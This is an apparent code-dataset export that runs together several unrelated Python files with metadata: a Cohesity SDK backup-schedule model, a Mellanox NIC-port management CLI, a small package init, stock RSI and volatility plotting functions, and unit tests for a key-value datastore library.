new Job Runs repetitively start at the beginning of the specified
time interval (in hours or minutes). 'kContinuousRPO' means this
is an RPO schedule.
rpo_schedule (RpoSchedule): Specifies an RPO backup schedule. Set if
periodicity is kContinuousRPO.
"""
# Create a mapping from Model property names to API property names
_names = {
"continuous_schedule":'continuousSchedule',
"daily_schedule":'dailySchedule',
"monthly_schedule":'monthlySchedule',
"periodicity":'periodicity',
"rpo_schedule":'rpoSchedule'
}
def __init__(self,
continuous_schedule=None,
daily_schedule=None,
monthly_schedule=None,
periodicity=None,
rpo_schedule=None):
"""Constructor for the SchedulingPolicy class"""
# Initialize members of the class
self.continuous_schedule = continuous_schedule
self.daily_schedule = daily_schedule
self.monthly_schedule = monthly_schedule
self.periodicity = periodicity
self.rpo_schedule = rpo_schedule
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
continuous_schedule = cohesity_management_sdk.models.continuous_schedule.ContinuousSchedule.from_dictionary(dictionary.get('continuousSchedule')) if dictionary.get('continuousSchedule') else None
daily_schedule = cohesity_management_sdk.models.daily_schedule.DailySchedule.from_dictionary(dictionary.get('dailySchedule')) if dictionary.get('dailySchedule') else None
monthly_schedule = cohesity_management_sdk.models.monthly_schedule.MonthlySchedule.from_dictionary(dictionary.get('monthlySchedule')) if dictionary.get('monthlySchedule') else None
periodicity = dictionary.get('periodicity')
rpo_schedule = cohesity_management_sdk.models.rpo_schedule.RpoSchedule.from_dictionary(dictionary.get('rpoSchedule')) if dictionary.get('rpoSchedule') else None
# Return an object of this model
return cls(continuous_schedule,
daily_schedule,
monthly_schedule,
periodicity,
rpo_schedule) | en | 0.781499 | # -*- coding: utf-8 -*- # Copyright 2019 Cohesity Inc. Implementation of the 'SchedulingPolicy' model. Specifies settings that define a backup schedule for a Protection Job. Attributes: continuous_schedule (ContinuousSchedule): Specifies the time interval between two Job Runs of a continuous backup schedule and any blackout periods when new Job Runs should NOT be started. Set if periodicity is kContinuous. daily_schedule (DailySchedule): Specifies a daily or weekly backup schedule. Set if periodicity is kDaily. monthly_schedule (MonthlySchedule): Specifies a monthly backup schedule. Set if periodicity is kMonthly. periodicity (PeriodicityEnum): Specifies how often to start new Job Runs of a Protection Job. 'kDaily' means new Job Runs start daily. 'kMonthly' means new Job Runs start monthly. 'kContinuous' means new Job Runs repetitively start at the beginning of the specified time interval (in hours or minutes). 'kContinuousRPO' means this is an RPO schedule. rpo_schedule (RpoSchedule): Specifies an RPO backup schedule. Set if periodicity is kContinuousRPO. # Create a mapping from Model property names to API property names Constructor for the SchedulingPolicy class # Initialize members of the class Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class. # Extract variables from the dictionary # Return an object of this model | 2.668455 | 3 |
networking_mlnx/eswitchd/cli/ebrctl.py | mail2nsrajesh/networking-mlnx | 0 | 9145 | #!/usr/bin/python
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from networking_mlnx.eswitchd.cli import conn_utils
from networking_mlnx.eswitchd.cli import exceptions
client = conn_utils.ConnUtil()
def parse():
"""Main method that manages supported CLI commands.
The actions that are supported throught the CLI are:
write-sys, del-port, allocate-port and add-port
Each action is matched with method that should handle it
e.g. write-sys action is matched with write_sys method
"""
parser = argparse.ArgumentParser(prog='ebrctl')
parser.add_argument('action', action='store_true')
parent_parser = argparse.ArgumentParser(add_help=False)
parent_parser.add_argument('vnic_mac')
parent_parser.add_argument('device_id')
parent_parser.add_argument('fabric')
parent_parser.add_argument('vnic_type')
subparsers = parser.add_subparsers()
parser_add_port = subparsers.add_parser('add-port',
parents=[parent_parser])
parser_add_port.add_argument('dev_name')
parser_add_port.set_defaults(func=add_port)
parser_add_port = subparsers.add_parser('allocate-port',
parents=[parent_parser])
parser_add_port.set_defaults(func=allocate_port)
parser_del_port = subparsers.add_parser('del-port')
parser_del_port.set_defaults(func=del_port)
parser_del_port.add_argument('fabric')
parser_del_port.add_argument('vnic_mac')
parser_write_sys = subparsers.add_parser('write-sys')
parser_write_sys.set_defaults(func=write_sys)
parser_write_sys.add_argument('path')
parser_write_sys.add_argument('value')
args = parser.parse_args()
args.func(args)
def allocate_port(args):
try:
dev = client.allocate_nic(args.vnic_mac, args.device_id,
args.fabric, args.vnic_type)
except exceptions.MlxException as e:
sys.stderr.write("Error in allocate command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def add_port(args):
try:
dev = client.plug_nic(args.vnic_mac, args.device_id, args.fabric,
args.vnic_type, args.dev_name)
except exceptions.MlxException as e:
sys.stderr.write("Error in add-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def del_port(args):
try:
client.deallocate_nic(args.vnic_mac, args.fabric)
except exceptions.MlxException as e:
sys.stderr.write("Error in del-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def write_sys(args):
try:
fd = open(args.path, 'w')
fd.write(args.value)
fd.close()
except Exception as e:
sys.stderr.write("Error in write-sys command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def main():
parse()
| #!/usr/bin/python
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from networking_mlnx.eswitchd.cli import conn_utils
from networking_mlnx.eswitchd.cli import exceptions
client = conn_utils.ConnUtil()
def parse():
"""Main method that manages supported CLI commands.
The actions that are supported throught the CLI are:
write-sys, del-port, allocate-port and add-port
Each action is matched with method that should handle it
e.g. write-sys action is matched with write_sys method
"""
parser = argparse.ArgumentParser(prog='ebrctl')
parser.add_argument('action', action='store_true')
parent_parser = argparse.ArgumentParser(add_help=False)
parent_parser.add_argument('vnic_mac')
parent_parser.add_argument('device_id')
parent_parser.add_argument('fabric')
parent_parser.add_argument('vnic_type')
subparsers = parser.add_subparsers()
parser_add_port = subparsers.add_parser('add-port',
parents=[parent_parser])
parser_add_port.add_argument('dev_name')
parser_add_port.set_defaults(func=add_port)
parser_add_port = subparsers.add_parser('allocate-port',
parents=[parent_parser])
parser_add_port.set_defaults(func=allocate_port)
parser_del_port = subparsers.add_parser('del-port')
parser_del_port.set_defaults(func=del_port)
parser_del_port.add_argument('fabric')
parser_del_port.add_argument('vnic_mac')
parser_write_sys = subparsers.add_parser('write-sys')
parser_write_sys.set_defaults(func=write_sys)
parser_write_sys.add_argument('path')
parser_write_sys.add_argument('value')
args = parser.parse_args()
args.func(args)
def allocate_port(args):
try:
dev = client.allocate_nic(args.vnic_mac, args.device_id,
args.fabric, args.vnic_type)
except exceptions.MlxException as e:
sys.stderr.write("Error in allocate command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def add_port(args):
try:
dev = client.plug_nic(args.vnic_mac, args.device_id, args.fabric,
args.vnic_type, args.dev_name)
except exceptions.MlxException as e:
sys.stderr.write("Error in add-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def del_port(args):
try:
client.deallocate_nic(args.vnic_mac, args.fabric)
except exceptions.MlxException as e:
sys.stderr.write("Error in del-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def write_sys(args):
try:
fd = open(args.path, 'w')
fd.write(args.value)
fd.close()
except Exception as e:
sys.stderr.write("Error in write-sys command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def main():
parse()
| en | 0.884169 | #!/usr/bin/python # Copyright 2013 Mellanox Technologies, Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. Main method that manages supported CLI commands. The actions that are supported throught the CLI are: write-sys, del-port, allocate-port and add-port Each action is matched with method that should handle it e.g. write-sys action is matched with write_sys method | 2.167085 | 2 |
survos/core/__init__.py | paskino/SuRVoS | 22 | 9146 |
from .launcher import Launcher
from .model import DataModel
from .layers import LayerManager
from .labels import LabelManager
from .singleton import Singleton
|
from .launcher import Launcher
from .model import DataModel
from .layers import LayerManager
from .labels import LabelManager
from .singleton import Singleton
| none | 1 | 1.140908 | 1 |
|
src/FinanceLib/analysis.py | Chahat-M/FinanceLib | 3 | 9147 | from typing import List, Union
import numpy as np
import pandas_datareader as pdr
import pandas as pd
import matplotlib.pyplot as plt
def rsi(symbol :str ,name :str, date :str) -> None :
"""
Calculates and visualises the Relative Stock Index on a Stock of the company.
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
name(str) : Name of the company
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
rsi('GOOG','Google','2020,01,01')
"""
ticker : str = pdr.get_data_yahoo(symbol, date)
delta : List[float] = ticker['Close'].diff()
up : int = delta.clip(lower=0)
down : int = -1*delta.clip(upper=0)
ema_up : Union[bool,float]= up.ewm(com=13, adjust=False).mean()
ema_down : Union[bool,float] = down.ewm(com=13, adjust=False).mean()
rs : float = ema_up/ema_down
ticker['RSI'] = 100 - (100/(1 + rs))
ticker : list = ticker.iloc[14:]
print(ticker)
fig, (ax1, ax2) = plt.subplots(2)
ax1.get_xaxis().set_visible(False)
fig.suptitle(name)
ticker['Close'].plot(ax=ax1)
ax1.set_ylabel('Price ($)')
ticker['RSI'].plot(ax=ax2)
ax2.set_ylim(0,100)
ax2.axhline(30, color='r', linestyle='--')
ax2.axhline(70, color='r', linestyle='--')
ax2.set_ylabel('RSI')
plt.show()
def volatility(symbol :str, date :str) ->None:
"""
Measures and visualizes the Volatility of a Stock by calculating the Average True Range(ATR)
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
volatility('GOOG','2020,01,01')
"""
data : str = pdr.get_data_yahoo(symbol,date)
data.head()
high_low : Union[int,float]= data['High'] - data['Low']
high_cp : List[float] = np.abs(data['High'] - data['Close'].shift())
low_cp : List[float]= np.abs(data['Low'] - data['Close'].shift())
df : List[str] = pd.concat([high_low, high_cp, low_cp], axis=1)
true_range : float= np.max(df, axis=1)
average_true_range : float= true_range.rolling(14).mean()
average_true_range
true_range.rolling(14).sum()/14
fig, ax = plt.subplots()
average_true_range.plot(ax=ax)
ax2 : Union[bool,float]= data['Close'].plot(ax=ax, secondary_y=True, alpha=.3)
ax.set_ylabel("ATR")
ax2.set_ylabel("Price")
plt.show() | from typing import List, Union
import numpy as np
import pandas_datareader as pdr
import pandas as pd
import matplotlib.pyplot as plt
def rsi(symbol :str ,name :str, date :str) -> None :
"""
Calculates and visualises the Relative Stock Index on a Stock of the company.
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
name(str) : Name of the company
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
rsi('GOOG','Google','2020,01,01')
"""
ticker : str = pdr.get_data_yahoo(symbol, date)
delta : List[float] = ticker['Close'].diff()
up : int = delta.clip(lower=0)
down : int = -1*delta.clip(upper=0)
ema_up : Union[bool,float]= up.ewm(com=13, adjust=False).mean()
ema_down : Union[bool,float] = down.ewm(com=13, adjust=False).mean()
rs : float = ema_up/ema_down
ticker['RSI'] = 100 - (100/(1 + rs))
ticker : list = ticker.iloc[14:]
print(ticker)
fig, (ax1, ax2) = plt.subplots(2)
ax1.get_xaxis().set_visible(False)
fig.suptitle(name)
ticker['Close'].plot(ax=ax1)
ax1.set_ylabel('Price ($)')
ticker['RSI'].plot(ax=ax2)
ax2.set_ylim(0,100)
ax2.axhline(30, color='r', linestyle='--')
ax2.axhline(70, color='r', linestyle='--')
ax2.set_ylabel('RSI')
plt.show()
def volatility(symbol :str, date :str) ->None:
"""
Measures and visualizes the Volatility of a Stock by calculating the Average True Range(ATR)
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
volatility('GOOG','2020,01,01')
"""
data : str = pdr.get_data_yahoo(symbol,date)
data.head()
high_low : Union[int,float]= data['High'] - data['Low']
high_cp : List[float] = np.abs(data['High'] - data['Close'].shift())
low_cp : List[float]= np.abs(data['Low'] - data['Close'].shift())
df : List[str] = pd.concat([high_low, high_cp, low_cp], axis=1)
true_range : float= np.max(df, axis=1)
average_true_range : float= true_range.rolling(14).mean()
average_true_range
true_range.rolling(14).sum()/14
fig, ax = plt.subplots()
average_true_range.plot(ax=ax)
ax2 : Union[bool,float]= data['Close'].plot(ax=ax, secondary_y=True, alpha=.3)
ax.set_ylabel("ATR")
ax2.set_ylabel("Price")
plt.show() | en | 0.571534 | Calculates and visualises the Relative Stock Index on a Stock of the company. Parameters: symbol(str) : Symbol of the company from https://in.finance.yahoo.com/ name(str) : Name of the company date(str) : start date of historical data in the format (YYYY,M,D) Returns: Return type: void Example: rsi('GOOG','Google','2020,01,01') Measures and visualizes the Volatility of a Stock by calculating the Average True Range(ATR) Parameters: symbol(str) : Symbol of the company from https://in.finance.yahoo.com/ date(str) : start date of historical data in the format (YYYY,M,D) Returns: Return type: void Example: volatility('GOOG','2020,01,01') | 3.367381 | 3 |
datastore/core/test/test_basic.py | jbenet/datastore | 1 | 9148 | <gh_stars>1-10
import unittest
import logging
from ..basic import DictDatastore
from ..key import Key
from ..query import Query
class TestDatastore(unittest.TestCase):
def subtest_simple(self, stores, numelems=1000):
def checkLength(len):
try:
for sn in stores:
self.assertEqual(len(sn), numelems)
except TypeError, e:
pass
self.assertTrue(len(stores) > 0)
pkey = Key('/dfadasfdsafdas/')
checkLength(0)
# ensure removing non-existent keys is ok.
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertFalse(sn.contains(key))
sn.delete(key)
self.assertFalse(sn.contains(key))
checkLength(0)
# insert numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertFalse(sn.contains(key))
sn.put(key, value)
self.assertTrue(sn.contains(key))
self.assertEqual(sn.get(key), value)
# reassure they're all there.
checkLength(numelems)
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
self.assertEqual(sn.get(key), value)
checkLength(numelems)
k = pkey
n = int(numelems)
allitems = list(range(0, n))
def test_query(query, slice):
for sn in stores:
try:
contents = list(sn.query(Query(pkey)))
expected = contents[slice]
result = list(sn.query(query))
# make sure everything is there.
self.assertTrue(len(contents) == len(allitems),\
'%s == %s' % (str(contents), str(allitems)))
self.assertTrue(all([val in contents for val in allitems]))
self.assertTrue(len(result) == len(expected),\
'%s == %s' % (str(result), str(expected)))
self.assertTrue(all([val in result for val in expected]))
#TODO: should order be preserved?
# self.assertEqual(result, expected)
except NotImplementedError:
print 'WARNING: %s does not implement query.' % sn
test_query(Query(k), slice(0, n))
test_query(Query(k, limit=n), slice(0, n))
test_query(Query(k, limit=n/2), slice(0, n/2))
test_query(Query(k, offset=n/2), slice(n/2, n))
test_query(Query(k, offset=n/3, limit=n/3), slice(n/3, 2*(n/3)))
del k
del n
# change numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
sn.put(key, value + 1)
self.assertTrue(sn.contains(key))
self.assertNotEqual(value, sn.get(key))
self.assertEqual(value + 1, sn.get(key))
checkLength(numelems)
# remove numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
sn.delete(key)
self.assertFalse(sn.contains(key))
checkLength(0)
class TestNullDatastore(unittest.TestCase):
def test_null(self):
from ..basic import NullDatastore
s = NullDatastore()
for c in range(1, 20):
c = str(c)
k = Key(c)
self.assertFalse(s.contains(k))
self.assertEqual(s.get(k), None)
s.put(k, c)
self.assertFalse(s.contains(k))
self.assertEqual(s.get(k), None)
for item in s.query(Query(Key('/'))):
raise Exception('Should not have found anything.')
class TestDictionaryDatastore(TestDatastore):
def test_dictionary(self):
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
stores = [s1, s2, s3]
self.subtest_simple(stores)
class TestCacheShimDatastore(TestDatastore):
def test_simple(self):
from ..basic import CacheShimDatastore
from ..basic import NullDatastore
class NullMinusQueryDatastore(NullDatastore):
def query(self, query):
raise NotImplementedError
# make sure the cache is used
s1 = CacheShimDatastore(NullMinusQueryDatastore(), cache=DictDatastore())
# make sure the cache is not relief upon
s2 = CacheShimDatastore(DictDatastore(), cache=NullDatastore())
# make sure the cache works in tandem
s3 = CacheShimDatastore(DictDatastore(), cache=DictDatastore())
self.subtest_simple([s1, s2, s3])
class TestLoggingDatastore(TestDatastore):
def test_simple(self):
from ..basic import LoggingDatastore
class NullLogger(logging.getLoggerClass()):
def debug(self, *args, **kwargs): pass
def info(self, *args, **kwargs): pass
def warning(self, *args, **kwargs): pass
def error(self, *args, **kwargs): pass
def critical(self, *args, **kwargs): pass
s1 = LoggingDatastore(DictDatastore(), logger=NullLogger('null'))
s2 = LoggingDatastore(DictDatastore())
self.subtest_simple([s1, s2])
class TestKeyTransformDatastore(TestDatastore):
def test_simple(self):
from ..basic import KeyTransformDatastore
s1 = KeyTransformDatastore(DictDatastore())
s2 = KeyTransformDatastore(DictDatastore())
s3 = KeyTransformDatastore(DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_reverse_transform(self):
from ..basic import KeyTransformDatastore
def transform(key):
return key.reverse
ds = DictDatastore()
kt = KeyTransformDatastore(ds, keytransform=transform)
k1 = Key('/a/b/c')
k2 = Key('/c/b/a')
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertFalse(kt.contains(k2))
ds.put(k1, 'abc')
self.assertEqual(ds.get(k1), 'abc')
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertEqual(kt.get(k2), 'abc')
kt.put(k1, 'abc')
self.assertEqual(ds.get(k1), 'abc')
self.assertEqual(ds.get(k2), 'abc')
self.assertEqual(kt.get(k1), 'abc')
self.assertEqual(kt.get(k2), 'abc')
ds.delete(k1)
self.assertFalse(ds.contains(k1))
self.assertEqual(ds.get(k2), 'abc')
self.assertEqual(kt.get(k1), 'abc')
self.assertFalse(kt.contains(k2))
kt.delete(k1)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertFalse(kt.contains(k2))
def test_lowercase_transform(self):
from ..basic import KeyTransformDatastore
def transform(key):
return Key(str(key).lower())
ds = DictDatastore()
lds = KeyTransformDatastore(ds, keytransform=transform)
k1 = Key('hello')
k2 = Key('HELLO')
k3 = Key('HeLlo')
ds.put(k1, 'world')
ds.put(k2, 'WORLD')
self.assertEqual(ds.get(k1), 'world')
self.assertEqual(ds.get(k2), 'WORLD')
self.assertFalse(ds.contains(k3))
self.assertEqual(lds.get(k1), 'world')
self.assertEqual(lds.get(k2), 'world')
self.assertEqual(lds.get(k3), 'world')
def test(key, val):
lds.put(key, val)
self.assertEqual(lds.get(k1), val)
self.assertEqual(lds.get(k2), val)
self.assertEqual(lds.get(k3), val)
test(k1, 'a')
test(k2, 'b')
test(k3, 'c')
class TestLowercaseKeyDatastore(TestDatastore):
def test_simple(self):
from ..basic import LowercaseKeyDatastore
s1 = LowercaseKeyDatastore(DictDatastore())
s2 = LowercaseKeyDatastore(DictDatastore())
s3 = LowercaseKeyDatastore(DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_lowercase(self):
from ..basic import LowercaseKeyDatastore
ds = DictDatastore()
lds = LowercaseKeyDatastore(ds)
k1 = Key('hello')
k2 = Key('HELLO')
k3 = Key('HeLlo')
ds.put(k1, 'world')
ds.put(k2, 'WORLD')
self.assertEqual(ds.get(k1), 'world')
self.assertEqual(ds.get(k2), 'WORLD')
self.assertFalse(ds.contains(k3))
self.assertEqual(lds.get(k1), 'world')
self.assertEqual(lds.get(k2), 'world')
self.assertEqual(lds.get(k3), 'world')
def test(key, val):
lds.put(key, val)
self.assertEqual(lds.get(k1), val)
self.assertEqual(lds.get(k2), val)
self.assertEqual(lds.get(k3), val)
test(k1, 'a')
test(k2, 'b')
test(k3, 'c')
class TestNamespaceDatastore(TestDatastore):
def test_simple(self):
from ..basic import NamespaceDatastore
s1 = NamespaceDatastore(Key('a'), DictDatastore())
s2 = NamespaceDatastore(Key('b'), DictDatastore())
s3 = NamespaceDatastore(Key('c'), DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_namespace(self):
from ..basic import NamespaceDatastore
k1 = Key('/c/d')
k2 = Key('/a/b')
k3 = Key('/a/b/c/d')
ds = DictDatastore()
nd = NamespaceDatastore(k2, ds)
ds.put(k1, 'cd')
ds.put(k3, 'abcd')
self.assertEqual(ds.get(k1), 'cd')
self.assertFalse(ds.contains(k2))
self.assertEqual(ds.get(k3), 'abcd')
self.assertEqual(nd.get(k1), 'abcd')
self.assertFalse(nd.contains(k2))
self.assertFalse(nd.contains(k3))
def test(key, val):
nd.put(key, val)
self.assertEqual(nd.get(key), val)
self.assertFalse(ds.contains(key))
self.assertFalse(nd.contains(k2.child(key)))
self.assertEqual(ds.get(k2.child(key)), val)
for i in range(0, 10):
test(Key(str(i)), 'val%d' % i)
class TestNestedPathDatastore(TestDatastore):
def test_simple(self):
from ..basic import NestedPathDatastore
s1 = NestedPathDatastore(DictDatastore())
s2 = NestedPathDatastore(DictDatastore(), depth=2)
s3 = NestedPathDatastore(DictDatastore(), length=2)
s4 = NestedPathDatastore(DictDatastore(), length=1, depth=2)
stores = [s1, s2, s3, s4]
self.subtest_simple(stores)
def test_nested_path(self):
from ..basic import NestedPathDatastore
nested_path = NestedPathDatastore.nestedPath
def test(depth, length, expected):
nested = nested_path('abcdefghijk', depth, length)
self.assertEqual(nested, expected)
test(3, 2, 'ab/cd/ef')
test(4, 2, 'ab/cd/ef/gh')
test(3, 4, 'abcd/efgh/ijk')
test(1, 4, 'abcd')
test(3, 10, 'abcdefghij/k')
def subtest_nested_path_ds(self, **kwargs):
from ..basic import NestedPathDatastore
k1 = kwargs.pop('k1')
k2 = kwargs.pop('k2')
k3 = kwargs.pop('k3')
k4 = kwargs.pop('k4')
ds = DictDatastore()
np = NestedPathDatastore(ds, **kwargs)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
np.put(k1, k1)
np.put(k2, k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertTrue(ds.contains(k3))
self.assertTrue(ds.contains(k4))
self.assertTrue(np.contains(k1))
self.assertTrue(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
self.assertEqual(np.get(k1), k1)
self.assertEqual(np.get(k2), k2)
self.assertEqual(ds.get(k3), k1)
self.assertEqual(ds.get(k4), k2)
np.delete(k1)
np.delete(k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
ds.put(k3, k1)
ds.put(k4, k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertTrue(ds.contains(k3))
self.assertTrue(ds.contains(k4))
self.assertTrue(np.contains(k1))
self.assertTrue(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
self.assertEqual(np.get(k1), k1)
self.assertEqual(np.get(k2), k2)
self.assertEqual(ds.get(k3), k1)
self.assertEqual(ds.get(k4), k2)
ds.delete(k3)
ds.delete(k4)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
def test_3_2(self):
opts = {}
opts['k1'] = Key('/<KEY>')
opts['k2'] = Key('/<KEY>')
opts['k3'] = Key('/<KEY>')
opts['k4'] = Key('/<KEY>')
opts['depth'] = 3
opts['length'] = 2
self.subtest_nested_path_ds(**opts)
def test_5_3(self):
opts = {}
opts['k1'] = Key('/<KEY>')
opts['k2'] = Key('/<KEY>')
opts['k3'] = Key('/<KEY>')
opts['k4'] = Key('/<KEY>')
opts['depth'] = 5
opts['length'] = 3
self.subtest_nested_path_ds(**opts)
def test_keyfn(self):
opts = {}
opts['k1'] = Key('/<KEY>')
opts['k2'] = Key('/<KEY>')
opts['k3'] = Key('/kj/ih/gf/abcdefghijk')
opts['k4'] = Key('/<KEY>')
opts['depth'] = 3
opts['length'] = 2
opts['keyfn'] = lambda key: key.name[::-1]
self.subtest_nested_path_ds(**opts)
class TestSymlinkDatastore(TestDatastore):
def test_simple(self):
from ..basic import SymlinkDatastore
s1 = SymlinkDatastore(DictDatastore())
s2 = SymlinkDatastore(DictDatastore())
s3 = SymlinkDatastore(DictDatastore())
s4 = SymlinkDatastore(DictDatastore())
stores = [s1, s2, s3, s4]
self.subtest_simple(stores)
def test_symlink_basic(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds = SymlinkDatastore(dds)
a = Key('/A')
b = Key('/B')
sds.put(a, 1)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
sds.link(a, b)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), 1)
self.assertEqual(sds.get(a), sds.get(b))
sds.put(b, 2)
self.assertEqual(sds.get(a), 2)
self.assertEqual(sds.get(b), 2)
self.assertEqual(sds.get(a), sds.get(b))
sds.delete(a)
self.assertEqual(sds.get(a), None)
self.assertEqual(sds.get(b), None)
self.assertEqual(sds.get(b), sds.get(a))
sds.put(a, 3)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
sds.delete(b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
def test_symlink_internals(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds = SymlinkDatastore(dds)
a = Key('/A')
b = Key('/B')
c = Key('/C')
d = Key('/D')
lva = sds._link_value_for_key(a)
lvb = sds._link_value_for_key(b)
lvc = sds._link_value_for_key(c)
lvd = sds._link_value_for_key(d)
# helper to check queries
sds_query = lambda: list(sds.query(Query(Key('/'))))
dds_query = lambda: list(dds.query(Query(Key('/'))))
# ensure _link_value_for_key and _link_for_value work
self.assertEqual(lva, str(a.child(sds.sentinel)))
self.assertEqual(a, sds._link_for_value(lva))
# adding a value should work like usual
sds.put(a, 1)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 1)
self.assertEqual(dds.get(b), None)
self.assertEqual(sds_query(), [1])
self.assertEqual(dds_query(), [1])
# _follow_link(sds._link_value_for_key(a)) should == get(a)
self.assertEqual(sds._follow_link(lva), 1)
self.assertEqual(list(sds._follow_link_gen([lva])), [1])
# linking keys should work
sds.link(a, b)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), 1)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(dds.get(a), 1)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [1, 1])
self.assertEqual(dds_query(), [1, lva])
# changing link should affect source
sds.put(b, 2)
self.assertEqual(sds.get(a), 2)
self.assertEqual(sds.get(b), 2)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(dds.get(a), 2)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [2, 2])
self.assertEqual(dds_query(), [2, lva])
# deleting source should affect link
sds.delete(a)
self.assertEqual(sds.get(a), None)
self.assertEqual(sds.get(b), None)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), None)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [None])
self.assertEqual(dds_query(), [lva])
# putting back source should yield working link
sds.put(a, 3)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [3, 3])
